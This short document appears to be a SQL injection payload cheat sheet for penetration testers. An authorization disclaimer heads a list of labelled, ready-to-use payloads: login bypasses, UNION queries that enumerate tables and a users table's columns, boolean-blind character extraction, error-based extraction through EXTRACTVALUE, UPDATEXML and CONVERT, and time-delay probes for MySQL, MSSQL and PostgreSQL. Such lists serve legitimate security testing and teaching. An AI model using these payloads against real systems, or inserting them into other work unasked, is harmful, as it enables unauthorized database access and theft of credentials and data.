Authorized Testing Only
SQL injection attacks on systems without authorization are illegal. Only use these payloads on systems you own or have explicit permission to test.
Testing Tips
Classic authentication bypass
' OR '1'='1
Bypass with SQL comment
' OR '1'='1'--
Bypass with hash comment (MySQL)
' OR '1'='1'#
Login as admin user
admin'--
Double quote variant
" OR "1"="1
Numeric field bypass
1 OR 1=1
Determine number of columns
' UNION SELECT NULL--
Two column UNION
' UNION SELECT NULL,NULL--
Get MySQL version
' UNION SELECT @@version,NULL--
Get MSSQL version
' UNION SELECT @@version,NULL--
Get PostgreSQL version
' UNION SELECT version(),NULL--
List all tables
' UNION SELECT table_name,NULL FROM information_schema.tables--
List columns from users table
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
Boolean-based blind (true condition)
' AND 1=1--
Boolean-based blind (false condition)
' AND 1=2--
Extract data character by character
' AND SUBSTRING(username,1,1)='a'--
Check database name length
' AND LENGTH(database())>5--
Extract data via error message
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT @@version)))--
UPDATEXML error extraction
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT user())),1)--
MSSQL conversion error
' AND 1=CONVERT(int,(SELECT @@version))--
5 second delay if vulnerable
' AND SLEEP(5)--
5 second delay for MSSQL
'; WAITFOR DELAY '0:0:5'--
5 second delay for PostgreSQL
'; SELECT pg_sleep(5)--
Conditional time delay
' AND IF(1=1,SLEEP(5),0)--